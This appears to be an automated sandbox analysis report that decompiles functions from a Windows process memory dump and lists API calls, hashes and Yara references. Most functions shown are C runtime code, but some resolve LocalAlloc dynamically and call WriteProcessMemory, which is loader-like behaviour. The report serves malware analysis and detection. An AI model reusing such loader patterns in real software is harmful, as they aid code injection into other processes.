Opcode ID: 2ff4a7507a82664706b41ccc9cbd6ec1c06fa3633e00bf2ef3564a6fd6ba3400
Instruction ID: e632cc59ba4a5d80a64c2a9ca55acfa2af86ea5880aefa0f9ebc00b70c59d765
Opcode Fuzzy Hash: 2ff4a7507a82664706b41ccc9cbd6ec1c06fa3633e00bf2ef3564a6fd6ba3400
Instruction Fuzzy Hash: 0481D432B08B8286EBA4AF25D44016DB691FF487B8F954235EA1D67BD5DF3CE8008724

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF27334 Relevance: 9.1, APIs: 6, Instructions: 59
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 56%

			E00007FF77FF7CEF27334(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rdx, long long __rdi, long long __rsi, void* __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _t23;
				intOrPtr* _t38;
				void* _t40;
				long long _t41;
				void* _t43;
				signed long long _t50;

				_t52 = __rsi;
				_t38 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t40 = __ecx;
				if ( *0xcef2fde0 != 0) goto 0xcef27372;
				E00007FF77FF7CEF25E60();
				_t4 = _t52 + 0x1d; // 0x1e
				E00007FF77FF7CEF25C00(_t4,  *0xcef2fde0, _t40, __rsi, __rbp);
				E00007FF77FF7CEF25850();
				_t50 = _t40 + _t40;
				if ( *((long long*)(0xcef2eb70 + _t50 * 8)) == 0) goto 0xcef2738b;
				goto 0xcef27404;
				E00007FF77FF7CEF274A0(_t40, _t43, _t50, _t52);
				_t41 = _t38;
				if (_t38 != 0) goto 0xcef273ac;
				E00007FF77FF7CEF25798(_t38, _t38);
				 *_t38 = 0xc;
				goto 0xcef27404;
				E00007FF77FF7CEF2741C();
				if ( *((long long*)(0xcef2eb70 + _t50 * 8)) != 0) goto 0xcef273ef;
				if (InitializeCriticalSectionAndSpinCount(??, ??) != 0) goto 0xcef273e8;
				E00007FF77FF7CEF27460(_t38, _t41);
				E00007FF77FF7CEF25798(InitializeCriticalSectionAndSpinCount(??, ??), _t38);
				 *_t38 = 0xc;
				goto 0xcef273f5;
				 *((long long*)(0xcef2eb70 + _t50 * 8)) = _t41;
				goto 0xcef273f5;
				_t23 = E00007FF77FF7CEF27460(_t38, _t41);
				LeaveCriticalSection(??);
				goto 0xcef27387;
				return _t23;
			}

0x7ff7cef27334
0x7ff7cef27334
0x7ff7cef27334
0x7ff7cef27339
0x7ff7cef2733e
0x7ff7cef27349
0x7ff7cef27359
0x7ff7cef2735b
0x7ff7cef27360
0x7ff7cef27363
0x7ff7cef2736d
0x7ff7cef27375
0x7ff7cef27385
0x7ff7cef27389
0x7ff7cef27390
0x7ff7cef27395
0x7ff7cef2739b
0x7ff7cef2739d
0x7ff7cef273a2
0x7ff7cef273aa
0x7ff7cef273b1
0x7ff7cef273c0
0x7ff7cef273cf
0x7ff7cef273d4
0x7ff7cef273d9
0x7ff7cef273de
0x7ff7cef273e6
0x7ff7cef273e8
0x7ff7cef273ed
0x7ff7cef273ef
0x7ff7cef273fc
0x7ff7cef27402
0x7ff7cef27419

APIs

_FF_MSGBANNER.LIBCMT ref: 00007FF7CEF2735B

Part of subcall function 00007FF7CEF25E60: _set_error_mode.LIBCMT ref: 00007FF7CEF25E69
Part of subcall function 00007FF7CEF25E60: _set_error_mode.LIBCMT ref: 00007FF7CEF25E78

Part of subcall function 00007FF7CEF25C00: _set_error_mode.LIBCMT ref: 00007FF7CEF25C45
Part of subcall function 00007FF7CEF25C00: _set_error_mode.LIBCMT ref: 00007FF7CEF25C56
Part of subcall function 00007FF7CEF25C00: GetModuleFileNameW.KERNEL32 ref: 00007FF7CEF25CB8

Part of subcall function 00007FF7CEF25850: ExitProcess.KERNEL32 ref: 00007FF7CEF2585F

Part of subcall function 00007FF7CEF274A0: malloc.LIBCMT ref: 00007FF7CEF274CB
Part of subcall function 00007FF7CEF274A0: Sleep.KERNEL32(?,?,?,00007FF7CEF27395,?,?,?,00007FF7CEF2743F), ref: 00007FF7CEF274DE

_errno.LIBCMT ref: 00007FF7CEF2739D
_lock.LIBCMT ref: 00007FF7CEF273B1
InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,00007FF7CEF2743F), ref: 00007FF7CEF273C7
_errno.LIBCMT ref: 00007FF7CEF273D9
LeaveCriticalSection.KERNEL32(?,?,?,00007FF7CEF2743F), ref: 00007FF7CEF273FC

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockmalloc
String ID:
API String ID: 2923989369-0
Opcode ID: 47de61ff78552703b8d08027e5de0850e91b74c297a0eae06539bb410adcf6ee
Instruction ID: b556174c83f7e80bdfc6e86fd02475815f616646547f48a23b8e48389229ec20
Opcode Fuzzy Hash: 47de61ff78552703b8d08027e5de0850e91b74c297a0eae06539bb410adcf6ee
Instruction Fuzzy Hash: ED213821E09786C2F6E5BF61A40577EE294EF817B4FD48434E94E666D2CF3CE8508321

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF21380 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 128
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00007FF77FF7CEF21380(long long __rbx, signed int __rcx, long long __rdx, long long __r8, long long __r11, signed int _a8, void* _a32) {
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				intOrPtr _t21;
				intOrPtr _t27;
				void* _t30;
				void* _t49;
				long long _t53;

				_t30 = _t49;
				 *((long long*)(_t30 + 0x20)) = __rbx;
				 *((long long*)(_t30 + 0x18)) = __r8;
				 *((long long*)(_t30 + 0x10)) = __rdx;
				 *((long long*)(_t30 + 8)) = __rcx;
				r11d = 0;
				_t53 =  *((intOrPtr*)(__r8 + 0x10));
				_v56 = __r11;
				_v48 = 0xcef30618;
				_v40 = _t53;
				_v32 = __r11;
				_v64 =  *((intOrPtr*)(__r8)) + _t53;
				_v72 = _t53;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 8)))) != r11d) goto 0xcef213fb;
				_t21 =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 8))));
				_t27 = _t21;
				if (_t27 == 0) goto 0xcef214e4;
				if (_t27 == 0) goto 0xcef2145e;
				if (_t27 == 0) goto 0xcef2141f;
				if (_t27 == 0) goto 0xcef2145e;
				if (_t21 - 0xffffffffffffffff == 3) goto 0xcef2145e;
				asm("dec eax");
				 *(__r8 + 0x18) = __rcx & _a8;
				return r11d;
			}

0x7ff7cef21380
0x7ff7cef21383
0x7ff7cef21387
0x7ff7cef2138b
0x7ff7cef2138f
0x7ff7cef2139d
0x7ff7cef213a3
0x7ff7cef213b1
0x7ff7cef213b5
0x7ff7cef213c1
0x7ff7cef213c5
0x7ff7cef213c9
0x7ff7cef213d3
0x7ff7cef213da
0x7ff7cef213e0
0x7ff7cef213e2
0x7ff7cef213e4
0x7ff7cef213ec
0x7ff7cef213f0
0x7ff7cef213f4
0x7ff7cef213f9
0x7ff7cef21405
0x7ff7cef21413
0x7ff7cef2141e

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7CEF21465
GetProcAddress.KERNEL32 ref: 00007FF7CEF21475
LocalFree.KERNEL32 ref: 00007FF7CEF214D9

Strings

LocalAlloc, xrefs: 00007FF7CEF2146B
kernel32, xrefs: 00007FF7CEF2145E

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLocalModuleProc
String ID: LocalAlloc$kernel32
API String ID: 1697219777-3502785670
Opcode ID: 1ced55bf900e1cfc94c77b7a9d4af983030c3a5c5699f4abca498f46f165df9d
Instruction ID: 0cc67442385b86210a3957718858d93ec9ae1b30594d6917f8d96941ea0bdd81
Opcode Fuzzy Hash: 1ced55bf900e1cfc94c77b7a9d4af983030c3a5c5699f4abca498f46f165df9d
Instruction Fuzzy Hash: 29515E33B14E5685EB90EF65E8400ADB3B5FB48BA8B994136DE4D63B48DF38D841C364

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF23EF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FF77FF7CEF23EF8(long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, long long _a8, long long _a16, void* _a24, long long _a32) {
				long long _v16;
				void* _v24;
				long long _v32;
				long long _v40;
				long long _t51;
				long long _t60;
				intOrPtr* _t62;
				intOrPtr* _t69;
				intOrPtr* _t72;
				long long _t78;

				_t53 = __rbx;
				_a8 = __rbx;
				_a16 = __rsi;
				_a32 = __rdi;
				_t69 = __rcx;
				_v40 =  &_a24;
				_v32 = 0xcef30618;
				_v16 = 0xcef30618;
				_t72 = __rdx;
				_v24 = __rbx;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				 *0xcef30618();
				_v24 = 0xcef30618;
				if (0xcef30618 == 0) goto 0xcef23fd1;
				_t12 = _t53 + 8; // 0x8
				r8d = _t12;
				if (E00007FF77FF7CEF21170(__rbx,  &_v40, __rcx, _t78) == 0) goto 0xcef23fc7;
				_t60 = _a24;
				_v40 = _t60;
				_v32 =  *((intOrPtr*)(_t69 + 8));
				if (_t60 ==  *_t69) goto 0xcef23fc7;
				r8d = 0x28;
				if (E00007FF77FF7CEF21170(_t53,  &_v24,  &_v40, _t78) == 0) goto 0xcef23fc7;
				_t62 = _v24;
				if ( *_t72 !=  *((intOrPtr*)(_t62 + 0x20))) goto 0xcef23fb3;
				if ( *((intOrPtr*)(_t72 + 4)) ==  *((intOrPtr*)(_t62 + 0x24))) goto 0xcef23fc1;
				_t51 =  *_t62;
				_v40 = _t51;
				if (_t51 ==  *_t69) goto 0xcef23fcb;
				goto 0xcef23f89;
				goto 0xcef23fcb;
				return LocalFree(??);
			}

0x7ff7cef23ef8
0x7ff7cef23ef8
0x7ff7cef23efd
0x7ff7cef23f02
0x7ff7cef23f13
0x7ff7cef23f1d
0x7ff7cef23f2a
0x7ff7cef23f2e
0x7ff7cef23f32
0x7ff7cef23f35
0x7ff7cef23f39
0x7ff7cef23f49
0x7ff7cef23f55
0x7ff7cef23f57
0x7ff7cef23f5e
0x7ff7cef23f60
0x7ff7cef23f60
0x7ff7cef23f72
0x7ff7cef23f74
0x7ff7cef23f7c
0x7ff7cef23f80
0x7ff7cef23f87
0x7ff7cef23f91
0x7ff7cef23f9e
0x7ff7cef23fa0
0x7ff7cef23fa9
0x7ff7cef23fb1
0x7ff7cef23fb3
0x7ff7cef23fb6
0x7ff7cef23fbd
0x7ff7cef23fbf
0x7ff7cef23fc5
0x7ff7cef23fe8

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7CEF23F39
GetProcAddress.KERNEL32 ref: 00007FF7CEF23F49

Part of subcall function 00007FF7CEF21170: SetFilePointer.KERNEL32 ref: 00007FF7CEF211D9
Part of subcall function 00007FF7CEF21170: GetModuleHandleW.KERNEL32 ref: 00007FF7CEF211F6
Part of subcall function 00007FF7CEF21170: GetProcAddress.KERNEL32 ref: 00007FF7CEF21206

LocalFree.KERNEL32 ref: 00007FF7CEF23FCB

Part of subcall function 00007FF7CEF21170: WriteProcessMemory.KERNEL32 ref: 00007FF7CEF21248
Part of subcall function 00007FF7CEF21170: GetModuleHandleW.KERNEL32 ref: 00007FF7CEF21257
Part of subcall function 00007FF7CEF21170: GetProcAddress.KERNEL32 ref: 00007FF7CEF21267
Part of subcall function 00007FF7CEF21170: LocalFree.KERNEL32 ref: 00007FF7CEF212B0

Strings

LocalAlloc, xrefs: 00007FF7CEF23F3F
kernel32, xrefs: 00007FF7CEF23F16

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc$FreeLocal$FileMemoryPointerProcessWrite
String ID: LocalAlloc$kernel32
API String ID: 3690204003-3502785670
Opcode ID: d8a25563b84a8b8da5a385e77a36fe545e94acd25a0052c9a3bbaf25ed5f8c59
Instruction ID: e3babd6b485b3331dcefb5ccd1fe29602904fe7d5f1f21a8582139af0285917b
Opcode Fuzzy Hash: d8a25563b84a8b8da5a385e77a36fe545e94acd25a0052c9a3bbaf25ed5f8c59
Instruction Fuzzy Hash: 7F316D72B05B02C9EB94EF61E8400ACB3B4FB48798B844431DE4D67B58DF78E559C764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF23FEE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00007FF77FF7CEF23FEE(void* __eax, void* __ebx, void* __ecx, long long __rbx, intOrPtr* __rcx, long long __rdi, void* __rsi, void* __r9, void* _a8, void* _a16) {
				long long _v16;
				signed int _v24;
				long long _v32;
				signed int _v40;
				void* __rbp;
				void* _t39;
				signed long long _t50;
				WCHAR* _t72;
				void* _t75;
				void* _t81;

				_t71 = __rsi;
				_t81 = _t75;
				 *((long long*)(_t81 + 8)) = __rbx;
				 *((long long*)(_t81 + 0x10)) = __rdi;
				_v24 = _v24 & 0x00000000;
				_v40 = _v40 & 0x00000000;
				_v16 = 0xcef30618;
				_v32 =  *((intOrPtr*)( *__rcx));
				if ( *0xcef2ef24 != 0) goto 0xcef2406a;
				 *((long long*)(_t81 - 0x38)) = 0xcef306c0;
				 *(_t81 - 0x40) =  *(_t81 - 0x40) & 0x00000000;
				r9d = 3;
				 *((long long*)(_t81 - 0x48)) = 0xcef306b8;
				if (E00007FF77FF7CEF23DA8(__rbx,  *__rcx, 0xcef2ef00, __rcx, __rsi, 0xcef2ef30, __r9, _t81) == 0) goto 0xcef240f4;
				_t50 =  *0xcef306b8; // 0x0
				_t52 =  *0xcef306c0;
				_v40 = _t50;
				E00007FF77FF7CEF23EF8( *0xcef306c0,  &_v40,  *((intOrPtr*)(__rcx + 0x10)), __rcx, _t71);
				_v40 = _t50;
				if (_t50 == 0) goto 0xcef240f4;
				GetModuleHandleW(_t72);
				GetProcAddress(??, ??);
				 *_t50();
				_v24 = _t50;
				if (_t50 == 0) goto 0xcef240f4;
				if (E00007FF77FF7CEF21170( *0xcef306c0,  &_v24,  &_v40, _t52 + 0x30) == 0) goto 0xcef240ea;
				if ( *0xcef306c0 + _v24 == 0) goto 0xcef240ea;
				E00007FF77FF7CEF23B74(_t39, _t52,  *0xcef306c0 + _v24, _t71, _t75, _t52 + 0x30);
				return LocalFree(??);
			}

0x7ff7cef23fee
0x7ff7cef23ff0
0x7ff7cef23ff3
0x7ff7cef23ff7
0x7ff7cef24003
0x7ff7cef24008
0x7ff7cef24021
0x7ff7cef24028
0x7ff7cef2402c
0x7ff7cef24043
0x7ff7cef24047
0x7ff7cef24053
0x7ff7cef24059
0x7ff7cef24064
0x7ff7cef2406a
0x7ff7cef24075
0x7ff7cef24080
0x7ff7cef24084
0x7ff7cef24089
0x7ff7cef24090
0x7ff7cef24099
0x7ff7cef240a9
0x7ff7cef240b8
0x7ff7cef240ba
0x7ff7cef240c1
0x7ff7cef240d6
0x7ff7cef240e3
0x7ff7cef240e5
0x7ff7cef24103

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7CEF24099
GetProcAddress.KERNEL32 ref: 00007FF7CEF240A9
LocalFree.KERNEL32 ref: 00007FF7CEF240EE

Strings

LocalAlloc, xrefs: 00007FF7CEF2409F
kernel32, xrefs: 00007FF7CEF24092

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLocalModuleProc
String ID: LocalAlloc$kernel32
API String ID: 1697219777-3502785670
Opcode ID: a4ba65414bfbc0efcb195b572de1388dbd8b7b6275e6f2a554c8fb93d7659486
Instruction ID: 7b2ccadede1237154d3cc53dc6de3b47cba57c4797c3a5498b40712e005d4b0b
Opcode Fuzzy Hash: a4ba65414bfbc0efcb195b572de1388dbd8b7b6275e6f2a554c8fb93d7659486
Instruction Fuzzy Hash: 1D312672A19F0695FB80EF61E8403A873A4FB88768F900536CA0C27668DF7CE549C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF28610 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,00007FF7CEF28725,?,?,?,?,00007FF7CEF2598A,?,?,?,00007FF7CEF244D4), ref: 00007FF7CEF28639
DecodePointer.KERNEL32(?,?,?,00007FF7CEF28725,?,?,?,?,00007FF7CEF2598A,?,?,?,00007FF7CEF244D4), ref: 00007FF7CEF28649

Part of subcall function 00007FF7CEF2910C: _errno.LIBCMT ref: 00007FF7CEF29115
Part of subcall function 00007FF7CEF2910C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CEF29120

EncodePointer.KERNEL32(?,?,?,00007FF7CEF28725,?,?,?,?,00007FF7CEF2598A,?,?,?,00007FF7CEF244D4), ref: 00007FF7CEF286C7

Part of subcall function 00007FF7CEF275A4: realloc.LIBCMT ref: 00007FF7CEF275CF
Part of subcall function 00007FF7CEF275A4: Sleep.KERNEL32(?,?,00000000,00007FF7CEF286B7,?,?,?,00007FF7CEF28725,?,?,?,?,00007FF7CEF2598A), ref: 00007FF7CEF275EB

EncodePointer.KERNEL32(?,?,?,00007FF7CEF28725,?,?,?,?,00007FF7CEF2598A,?,?,?,00007FF7CEF244D4), ref: 00007FF7CEF286D7
EncodePointer.KERNEL32(?,?,?,00007FF7CEF28725,?,?,?,?,00007FF7CEF2598A,?,?,?,00007FF7CEF244D4), ref: 00007FF7CEF286E4

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
String ID:
API String ID: 1909145217-0
Opcode ID: 58590357ac74606fc0f2bc527207cdb1ba4607e8dd5afc26dccf76334392a10b
Instruction ID: 3bf24848ec3de981f6a54effbd962130ab6851dcee87b318c1ea7131f9a9700a
Opcode Fuzzy Hash: 58590357ac74606fc0f2bc527207cdb1ba4607e8dd5afc26dccf76334392a10b
Instruction Fuzzy Hash: 6F216D21B0AB8A81EA81BF61F948069E391BF44BF0B844835DD0E2B755EF7CE584C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF26A58 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7CEF26A8F
GetCurrentProcessId.KERNEL32 ref: 00007FF7CEF26A9A
GetCurrentThreadId.KERNEL32 ref: 00007FF7CEF26AA6
GetTickCount.KERNEL32 ref: 00007FF7CEF26AB2
QueryPerformanceCounter.KERNEL32 ref: 00007FF7CEF26AC3

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: b5717c3ae1978e90090d18bddf620ebef6e1dda1b2ac5f81843dbc827e59ee84
Instruction ID: 6d9e5e9a9791045cbeee927c6a9ce686ec2187acd564ca4a11df7c306e2e7bec
Opcode Fuzzy Hash: b5717c3ae1978e90090d18bddf620ebef6e1dda1b2ac5f81843dbc827e59ee84
Instruction Fuzzy Hash: EF01C421A18E0582FBD19F21F850265A360FB09BA0F952631DE5E577A4CF3DD884C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF25200 Relevance: 7.5, APIs: 5, Instructions: 37
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 24%

			E00007FF77FF7CEF25200(long* __rax, long long __rbx, long long _a8) {
				void* __rdi;
				void* _t7;
				long _t9;
				void* _t10;
				long* _t23;
				long* _t27;
				void* _t29;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t35;

				_t23 = __rax;
				_a8 = __rbx;
				GetLastError();
				__imp__FlsGetValue();
				if (__rax != 0) goto 0xcef2526e;
				_t7 = E00007FF77FF7CEF27520(__rax, _t29, _t31, _t33, _t34, _t35);
				_t27 = _t23;
				if (_t23 == 0) goto 0xcef2526e;
				__imp__FlsSetValue();
				if (_t7 == 0) goto 0xcef25267;
				E00007FF77FF7CEF25148(_t27, _t27, _t23);
				_t9 = GetCurrentThreadId();
				_t27[2] = _t27[2] | 0xffffffff;
				 *_t27 = _t9;
				goto 0xcef2526e;
				_t10 = E00007FF77FF7CEF27460(_t23, _t27);
				SetLastError(??);
				return _t10;
			}

0x7ff7cef25200
0x7ff7cef25200
0x7ff7cef2520a
0x7ff7cef25218
0x7ff7cef25224
0x7ff7cef2522e
0x7ff7cef25233
0x7ff7cef25239
0x7ff7cef25244
0x7ff7cef2524f
0x7ff7cef25253
0x7ff7cef25258
0x7ff7cef2525e
0x7ff7cef25263
0x7ff7cef25265
0x7ff7cef25267
0x7ff7cef25270
0x7ff7cef25283

APIs

GetLastError.KERNEL32(?,?,?,00007FF7CEF257A1,?,?,?,?,00007FF7CEF242F5,?,?,?,?,00007FF7CEF2365D), ref: 00007FF7CEF2520A
FlsGetValue.KERNEL32(?,?,?,00007FF7CEF257A1,?,?,?,?,00007FF7CEF242F5,?,?,?,?,00007FF7CEF2365D), ref: 00007FF7CEF25218
SetLastError.KERNEL32(?,?,?,00007FF7CEF257A1,?,?,?,?,00007FF7CEF242F5,?,?,?,?,00007FF7CEF2365D), ref: 00007FF7CEF25270

Part of subcall function 00007FF7CEF27520: Sleep.KERNEL32(?,?,?,00007FF7CEF25233,?,?,?,00007FF7CEF257A1,?,?,?,?,00007FF7CEF242F5), ref: 00007FF7CEF27565

FlsSetValue.KERNEL32(?,?,?,00007FF7CEF257A1,?,?,?,?,00007FF7CEF242F5,?,?,?,?,00007FF7CEF2365D), ref: 00007FF7CEF25244

Part of subcall function 00007FF7CEF25148: _lock.LIBCMT ref: 00007FF7CEF2519C
Part of subcall function 00007FF7CEF25148: _lock.LIBCMT ref: 00007FF7CEF251BB

GetCurrentThreadId.KERNEL32 ref: 00007FF7CEF25258

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: ErrorLastValue_lock$CurrentSleepThread
String ID:
API String ID: 2194181773-0
Opcode ID: c2f942c3b6ac40cb3a111eec1c8f5182fc61f3bbf0bd2a821944a0c7fd960737
Instruction ID: 505f3f847e9393601346d31d137604ea3c51d97f3cd5a3b3e4259fd0f8a85153
Opcode Fuzzy Hash: c2f942c3b6ac40cb3a111eec1c8f5182fc61f3bbf0bd2a821944a0c7fd960737
Instruction Fuzzy Hash: 28012120A09B4282FAD6BF75A445039A291AF48BB0F984634D91D123D5EF3CE4449A21

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF241D4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00007FF77FF7CEF241D4(void* __eflags, long long __rbx, void* __rcx, signed short* __rdx, long long __rsi, long long __rbp, void* __r8, void* _a8, void* _a16, void* _a24) {
				intOrPtr _v16;
				intOrPtr _v24;
				char _v40;
				signed int _t25;
				signed short _t28;
				signed int _t31;
				void* _t32;
				signed short _t33;
				intOrPtr* _t53;
				intOrPtr* _t77;

				_t56 = __rbx;
				_t53 = _t77;
				 *((long long*)(_t53 + 8)) = __rbx;
				 *((long long*)(_t53 + 0x10)) = __rbp;
				 *((long long*)(_t53 + 0x18)) = __rsi;
				E00007FF77FF7CEF24130(_t53, _t53 - 0x28, __r8);
				if (__rcx != 0) goto 0xcef2422e;
				E00007FF77FF7CEF25798(__rcx, _t53);
				 *_t53 = 0x16;
				E00007FF77FF7CEF25730();
				if (_v16 == bpl) goto 0xcef24224;
				 *(_v24 + 0xc8) =  *(_v24 + 0xc8) & 0xfffffffd;
				goto 0xcef242c1;
				if (__rdx == 0) goto 0xcef24201;
				if ( *((intOrPtr*)(_v40 + 0x14)) != 0) goto 0xcef24277;
				_t31 =  *(__rcx - __rdx + __rdx) & 0x0000ffff;
				if (_t31 - 0x41 < 0) goto 0xcef24254;
				if (_t31 - 0x5a > 0) goto 0xcef24254;
				_t32 = _t31 + 0x20;
				_t25 =  *__rdx & 0x0000ffff;
				if (_t25 - 0x41 < 0) goto 0xcef24267;
				if (_t25 - 0x5a > 0) goto 0xcef24267;
				if (_t32 == 0) goto 0xcef242a6;
				if (_t32 == _t25 + 0x20) goto 0xcef24240;
				goto 0xcef242a6;
				_t33 = E00007FF77FF7CEF25460( *(__rcx - __rdx) & 0x0000ffff, _v40, __rbx,  &_v40) & 0x0000ffff;
				_t28 = E00007FF77FF7CEF25460(__rdx[1] & 0x0000ffff, _v40, _t56,  &_v40);
				if (_t33 == 0) goto 0xcef242a6;
				if (_t33 == _t28) goto 0xcef24277;
				if (_v16 == bpl) goto 0xcef242c1;
				 *(_v24 + 0xc8) =  *(_v24 + 0xc8) & 0xfffffffd;
				return (_t33 & 0x0000ffff) - (_t28 & 0x0000ffff);
			}

0x7ff7cef241d4
0x7ff7cef241d4
0x7ff7cef241d7
0x7ff7cef241db
0x7ff7cef241df
0x7ff7cef241f5
0x7ff7cef241ff
0x7ff7cef24201
